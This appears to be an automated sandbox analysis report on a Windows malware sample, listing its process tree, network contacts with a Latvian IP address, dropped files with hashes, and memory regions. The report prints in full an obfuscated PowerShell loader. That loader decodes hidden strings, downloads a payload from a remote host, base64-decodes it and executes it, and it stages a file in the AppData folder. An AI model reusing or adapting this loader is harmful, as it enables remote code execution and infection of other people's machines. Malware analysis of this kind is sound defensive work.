InverieLubberlrVoldgifn ForgreePre,ecl Hjkultu=beregni Side.me[Mora.isSzinckenyTribunesSussysttRaanokkeSpildevm blowha.AlliancCRudderhoUn erbynDeba.tevAlst upe,ommetarSk.iftrtBlodpla]fr.mpro:Psychom:MetrumsFdikuirerTrioicooTineweemDechlorBsubterhaPrimegisSupplereEdelwei6F.ttock4RdsptteSSul,hurtSnifferr VilligiDerbyernAnonymigColesee(asympto$Busbanet AmaryliAnischumM triaraSu,rounuGrund raPrototr)Minions ');Valgmenighedernes (Filbetegnelse ' Balakk$S rychng c emosl Guessto FedesvbDe,onstaSkriverl Leache:FiremasSChondran s.enarnGripep,iUnattackp,ramideSlumpssrBo deaunOve,cone larrig Cosmopo=Kuperin Pauseme[Udvlg,lS LandinyAfdampes evlerstYppigerePh,laenmKollegi. DeprogTPeriodee .urmulxAf,rkket Overb,.Crad.ecE GrousenGraf rncSmyrneaofylfotsdRob.tisiForgrunnMi faregEruptiv]Superst:carlish:F seforAAlfastrSI,kerquCsubtetaI Shark,ICraftin.TrappesGUn,appee slagmatNeoteriSPre.edet VonnierTank,gaiDiagnosnCloutingIndslag(Rhe,met$PromagiDConceptaBe.mysutOutjumpaG.cksrebnonpestaFl,ndernmiljbeskSkrigene Sal.onrPrins,sn ServieeHyposta) Platic ');Valgmenighedernes (Filbetegnelse ' K,nsta$ SvejtsgRinginelPrunabloMuskulrbU,produa Myc,lolRepatro:DesultoK Spr.ngbViolaqumleva,tka Ha.rrrnPh,laend Ove ineAdmin snKamgrss=Bugvgbl$FlokinsSUnputr nscruplenRevolutiFileredkChaunopeSt,laiprS umretnPrstindeIndkast. UnderfsPolydynuOpsamlib,hioanvs Kildret Nyttevr Cop odiDonatepnNurserygVi,flas(Acciden$StreptoBOwnnes.iSkattedfC bildol HydrogoDio trydUvilligeKimme,irGapeseenOverrepeSixtens, Se,ail$illegitPToucheerstegefei a.derivShipmenaFagbladtSkat etuSubchelnBelejr d.muletteBeskiknrFreetyevToldgrni BridecsSphenetn Femaari Rets.nnHabenalg DiphtheZinkkogrGradualsRehu.an),lasikk ');Valgmenighedernes $Kbmanden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Signe = 1;$Variabeltypes='ring';Function Filbetegnelse($Wadmels){$Sunsquall=$Wadmels.Length-$Signe;$Untailorlike='Subst'+$Variabeltypes;For( $Anaspalin=7;$Anaspalin -lt $Sunsquall;$Anaspalin+=8){$Gruttende+=$Wadmels.$Untailorlike.Invoke( $Anaspalin, $Signe);}$Gruttende;}function Valgmenighedernes($Manendes){ & ($illegalisation) ($Manendes);}$Gamasoidea=Filbetegnelse ' BabyinMJulekaloMelanchzGrou.dwiSparkpalCreptvilorpinsea Truing/Killock5Lejligh.Sekret,0Forsan, Bundga(Pul,onaWCra stviFolketinProlo,ud TyllefoHencemiw Formods Resume GenbesNSikk,rhT equiva Spystil1Decenni0,nteral.Un,esto0 Minisu;Sme.tep Pa.amanWI.doktri Stereon Sigted6Tavlesv4 notabi;Ostiate SulfofxMetabas6 rotect4Kransst;Rebokes parkgstrDrtrsklv Rrlgn :Sub,oen1Sk leel2Ovarier1 Grynte.Me,oria0Fo budd)Stan se hede skGFlonelleGammeljcCursivekEpicardoRecubat/Fanwort2Unrejec0Genrebe1Recani.0 Adspl.0Cubicit1Sanitor0Var.fys1 M zuza UnpervaFgr.mmatiRet krarForageseTrafi.ofDynamogo WhizzbxOmplace/Monticu1Avlsbru2Enla es1 Villia.Whitten0 Forjag ';$Scirrhus=Filbetegnelse 'SygesikUBr ddensurigt geGovernar iffere- D variAFo.efalg DebatpeMa.ropln Coelint ,ntikv ';$Waxingly=Filbetegnelse 'BagflikhBassangtTeskeretAktio.ipGe,give:egisrut/ bil ag/Bra.ker4Zeuneri6Papolat.Floskle1 Mis,ai8Setdown3 Beskik.Bi.ulfa2Harmoni2Fla,ell2Ensilat. Treeta1hissing5Usan sy/ MellemGGgeblomlGlobulia,ntermidGallo.alTohaandiAnatomoeVandskisSalsalatReboote.Paterepj GoldesaOcul,pavDivulsoaBulletw ';$Forduftede71=Filbetegnelse 'Ndersun> Beastl ';$illegalisation=Filbetegnelse 'Glostsdi ShyesseIndtgtsxMasedem ';$Determinacy='Indiapapir132';$Heteroclital = Filbetegnelse 'SkitsereRokni gc AliyoshProag,ioPhotofl Kle,tom% KrydsoaFlisevgpSnitsa p JewishdLand,seaB.nepsytUnreproaUdskeje% Fi,kes\Blr.rneS,rudgincCompursh M.lleme Modi,in TronadkSkattefeArsenoplM ldirevKe,nespiPinc.gug unportnAkupunki Redninn Unassig margu.eFloodprrWo.derfsPoxycot.afhoertsSkorzonaBakterimHightin Redacto&Unsatir&Partiti StavesveBeseglecHempsarhDemonstoRej ebe ViticultLt,tleb ';Valgmenighedernes (Filbetegnelse 'Tomor,o$FredningEventualOffend oErratasb Dg,insaLividitl L.eadg: PersonATipoldelSemid clKimcheeiSprightgBobbingaSss.nsttGoat,ruiVaud uxole.terlnHemmeli=Trylles(Radialgc Skuffem Mult,cd Frustr L cubra/ Tils,ecForskel Lnst.pp$ St.rneHSpydigseF renootBrem.ereTruthler .efereoLanguedc GazumplPreach iGittknitParticia Devexil Udsti )Udmejsl ');Valgmenighedernes (Filbetegnelse 'Brkjern$Pre.mblgHaandfll TistykoGonorrsbForna naIn estalIndus r: PeriphS Erodera IntercmMerostom.rfrieweAlderdonAzoficatBrandflrSystylonJordfstgRopelaynMcadam,isway,ulnVoltit.g UnbruteAl uderr Infini2Tilhold4.ortsta0Reh.ars=Vendue $BeregniWNoninc aPortionxRikardsi WeddednBu banegclawkphlTwan edyBrnevre.CoagitasDmpendep HyperdlBanuseliPl,vskrtThirtyp(Formueo$QuizsmoFkaffessoAutori rRefer idLampmanuCont,mafPar eretJordlageStandpadP lariseSy boli7Patter 1M,neant)Skubspy ');$Waxingly=$Sammentrngninger240[0];$Civilness= (Filbetegnelse 'Neakesm$Meallesg Chat ll Forl.goIsopetabHy.omoraOsteostlLaanets:NattevaINaboerslAnneroddEnecellsUnmedialBoothagu Ri gvrkTeknonyn tigmatiUnfo benEkspansgIni.uitsR,imunda.everanpBra.dhjpLatiniaaTallagervddendeaAbstinet RegioneNulletst I tercsBu.lies=Oprej,nNM mickeeTusindewRallyet-handelsOU evgelb UnflesjvemodigeCord,tecReveriftNeumann UnbendSSomniloyForken.sDidaktitBlondineHaandfumMilie,p. DobbelNKantte,eSaloonetSlilydi.TrademyW Bank,pe Ynke sbBengtenCAxonicdl utterei Poperie AmputenP eonast');$Civilness+=$Alligation[1];Valgmenighedernes ($Civilness);Valgmenighedernes (Filbetegnelse 'Unpriva$MontgolIShlumpslSingle,dUdlic,tsEdmaszel Gr tinuun,oodfkPragmatnKalced.iPapercunNona.sogBrostensDannebraI.trigepKarnevapQuantisa .ktieur D filaaTeks,edtSk tteae Internt traales Papaen.Snder,eHne,hinie Trans aTabtypedFo.mingeRoachlirAuto.obsandroph[Oplg.in$TllingeSsvrms hcEk portiUnderclrDagsprirFlejnskhTra.situSlaskedsFiskesk]Dampkog=Lam,yma$AdenytaGT.icopha.ontingm rytte.a UdvalgsAllerhjoDirtiediKbstderdStringheSt,eameaSlgtled ');$Quittances=Filbetegnelse 'Exc mmu$ lausenIGnaversltambacsd SprogssEricophlDr.lageuT.bulark Abjuncn,rooneriClubablnekspresgUntimorsB,ookliaAl,alimpUrticatpInddataaReskomprSmaavasaSkalottt Saarske Polarit TamtamsYderlig.LumredeDBrownmooAppare.wKateternAfterpilPickeltoSparttiaArseniodPalaeoeFSupersoiSoamuntl esponseMadopsk( Tennis$ attigfWAfsi,diaEc.asitxBleskudiFeltflanRecirclgSull,abl Evako.y Tropho,Conjuga$P,ioritTNode laoafregneeDeliriejCrenothllammergeMi lion)Udkastn ';$Toejle=$Alligation[0];Valgmenighedernes (Filbetegnelse 'Succurs$.epskong inealelBokseboo MastmabGliadinaJannichl .kumme:Energ bAKejtedea S.ltegn rintpddeburghsPersonraErhvervrD agemoiTungstesUncapertSu,eredo ChoanokKunstudrDatabasa Easuret sdvanliStyrtdye GendrirAs.urgenChartereFormn.n=Trichot(uricoleTSedentaePyrewins LnovertSanglrk-HrmyredPBoksehaaGruppeat PreiothOphiob Creamc$UnlawmiTSabbyunoSuperc eGa,lamijbarratrlHan,skee Lvspri) Data,e ');while (!$Aandsaristokratierne) {Valgmenighedernes (Filbetegnelse 'Semipro$Ey opengHoodooblSkuboppo PaagribSki,bruaApartadlre eren:Hjlpev.rSalthoro PhantovSgnehelfGaloisfiUmbraensNonf sskOpryknieEbbingundecolors Sutteg=Gtemnds$myc.soztstillinr,nadipsuBarrelfe erhver ') ;Valgmenighedernes $Quittances;Valgmenighedernes (Filbetegnelse 'Abs rbeSperspectPresentaKi,engerKraverstcelebra-ByggeriSHaablstlElmyskre Dichroe O.erflp av,ntg Somme g4 Pla,fo ');Valgmenighedernes (Filbetegnelse 'forldel$Inh lergpr,tochlLabionaoCarburebUnaffliaSmedejeldannels:AcosmisA opklara CottifnUniv.rsdHovedstsFaci ita Rasherrwoo.ieriTricotpsDenicottImpervioelektrok TribelrGrevskaaLyseslutVermlaniStedtileKurdishrLa.ellunAdmiraleKiselsy=Heweudl(FourierTJeo.ordeFrekvensAnnlilstPlsebrd-FrdselsPSalgsseaLinguant Or,sgnhPers.nk Gennemh$SvornefTPutredio Mispere NotidajRaastofl AcyloxeFot.alb) mprovi ') ;Valgmenighedernes (Filbetegnelse 'Lsrepa $AssistegGalpendlPolerino.uarnerbRetsviraRu kusclOverste:MilksopPAltruissEscargoerollmopuFo.trffdIngenioo,ikronea Skumslnhe hrenarelaunccSlumarbhKvaliterTotalizoHaem,stn,ungmetiAs luslsSl erpatKlorofoifo.boldcS,repor=Voltmet$Sam.enrgSkrsildl martneoRegis.ebDesc ieaUove.enlBortlic:Glam.urR FremryiEkspartcAsylre.kResurresUntolerhNutr tiasem cos+Indkoms+Trespro%Estrich$MinkfarSSulfinea En eromRe setsmSymphoneNedskrinUlrikatt OverburSy svinn Damerkg PipiesnUn.ourniWhich,onStreg,ogProgra,eBordherrAutodyn2 A,ticy4Individ0Cinnamo.uopfyldcslutbe,oBagerisuSkoleelnudkaarit S bles ') ;$Waxingly=$Sammentrngninger240[$Pseudoanachronistic];}$Bifloderne=346851;$Privatundervisningers=30771;Valgmenighedernes (Filbetegnelse 'Koksbla$Ho.gastg PrdikalMos ismo Neda vbRomantiaLineocilAgitate:BitterbtArg,ntiiDowsabemBarakkea sa,dwiu Axi ymaSeemlie Workhov=Tjrenel Aksem gG.ilbageeBall.tatE.fases-Noi,efuCTabernaoArgentin,ordgtit,illemieBarnyv,nZanettetStrbemr graphic$bonitypTunittruo Unho,iePtocholjRygeo,tlTiresomeOpkalds ');Valgmenighedernes (Filbetegnelse ' Chilen$ SelfmagufordrvlPers.ecoGoyi.rvbDil,ttaaEta lerlrv,ulle:Quin,llDf,ooeycaUnsedestEfterfla Rusernb Overdra N,nintn tvnevak InverieLubberlrVoldgifn ForgreePre,ecl Hjkultu=beregni Side.me[Mora.isSzinckenyTribunesSussysttRaanokkeSpildevm blowha.AlliancCRudderhoUn erbynDeba.tevAlst upe,ommetarSk.iftrtBlodpla]fr.mpro:Psychom:MetrumsFdikuirerTrioicooTineweemDechlorBsubterhaPrimegisSupplereEdelwei6F.ttock4RdsptteSSul,hurtSnifferr VilligiDerbyernAnonymigColesee(asympto$Busbanet AmaryliAnischumM triaraSu,rounuGrund raPrototr)Minions ');Valgmenighedernes (Filbetegnelse ' Balakk$S rychng c emosl Guessto FedesvbDe,onstaSkriverl Leache:FiremasSChondran s.enarnGripep,iUnattackp,ramideSlumpssrBo deaunOve,cone larrig Cosmopo=Kuperin Pauseme[Udvlg,lS LandinyAfdampes evlerstYppigerePh,laenmKollegi. DeprogTPeriodee .urmulxAf,rkket Overb,.Crad.ecE GrousenGraf rncSmyrneaofylfotsdRob.tisiForgrunnMi faregEruptiv]Superst:carlish:F seforAAlfastrSI,kerquCsubtetaI Shark,ICraftin.TrappesGUn,appee slagmatNeoteriSPre.edet VonnierTank,gaiDiagnosnCloutingIndslag(Rhe,met$PromagiDConceptaBe.mysutOutjumpaG.cksrebnonpestaFl,ndernmiljbeskSkrigene Sal.onrPrins,sn ServieeHyposta) Platic ');Valgmenighedernes (Filbetegnelse ' K,nsta$ SvejtsgRinginelPrunabloMuskulrbU,produa Myc,lolRepatro:DesultoK Spr.ngbViolaqumleva,tka Ha.rrrnPh,laend Ove ineAdmin snKamgrss=Bugvgbl$FlokinsSUnputr nscruplenRevolutiFileredkChaunopeSt,laiprS umretnPrstindeIndkast. UnderfsPolydynuOpsamlib,hioanvs Kildret Nyttevr Cop odiDonatepnNurserygVi,flas(Acciden$StreptoBOwnnes.iSkattedfC bildol HydrogoDio trydUvilligeKimme,irGapeseenOverrepeSixtens, Se,ail$illegitPToucheerstegefei a.derivShipmenaFagbladtSkat etuSubchelnBelejr d.muletteBeskiknrFreetyevToldgrni BridecsSphenetn Femaari Rets.nnHabenalg DiphtheZinkkogrGradualsRehu.an),lasikk ');Valgmenighedernes $Kbmanden;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Schenkelvigningers.sam && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\extrac32.exe

"C:\Windows\SysWOW64\extrac32.exe"

Network

Country Destination Domain Proto
LV 46.183.222.15:80 46.183.222.15 tcp
LV 46.183.222.15:80 46.183.222.15 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab676C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2636-20-0x000007FEF643E000-0x000007FEF643F000-memory.dmp

memory/2636-21-0x000000001B110000-0x000000001B3F2000-memory.dmp

memory/2636-22-0x00000000026A0000-0x00000000026A8000-memory.dmp

memory/2636-23-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2636-24-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2636-25-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2636-26-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2636-27-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49M9BHF86VFWLGXOAQDX.temp

MD5 19f8ca6aca9eb8b8d3bce549d4a9a4d9
SHA1 d4bb7eb231fd996238bfab18ec5984afab0d68fd
SHA256 18e48a226c9057f2eed4742246a7005c331cd799da0bc4e13f801aa10d796e5c
SHA512 d4e21f1b0672cfd17e5b42f6746cf7b76ac21535aff6dab5c0a8a6b511133338fa02ccfedf342a92925b9a74bf1334fbd2d66c430f0edf6f3a2a353c8bc42dda

C:\Users\Admin\AppData\Roaming\Schenkelvigningers.sam

MD5 9a68c95ad5b5da02da5f2bb483de9d76
SHA1 e555b4aad443585e6874ece154def81c7fe805e2
SHA256 6ae7efbb0fe7f146254b0a191a5af7866754b97548cf050529e4491e0e913dbc
SHA512 dd10ff9c44a790d5db6b1057cefb91564365a00a009d23129618e4a7329d4a71d3dbefc20baa5ff36e6bed037cf825a6d02433af9c59c74573415226eeaecb41

memory/2636-33-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2636-34-0x000007FEF643E000-0x000007FEF643F000-memory.dmp

memory/3036-35-0x00000000060C0000-0x000000000A0D7000-memory.dmp

memory/2396-38-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2636-39-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2396-40-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2396-41-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2396-42-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2396-43-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2396-44-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1308-47-0x0000000002D70000-0x0000000002E70000-memory.dmp

memory/1044-48-0x0000000000080000-0x00000000000BF000-memory.dmp

memory/2396-49-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2396-50-0x0000000000400000-0x0000000000581000-memory.dmp

memory/1044-51-0x0000000000080000-0x00000000000BF000-memory.dmp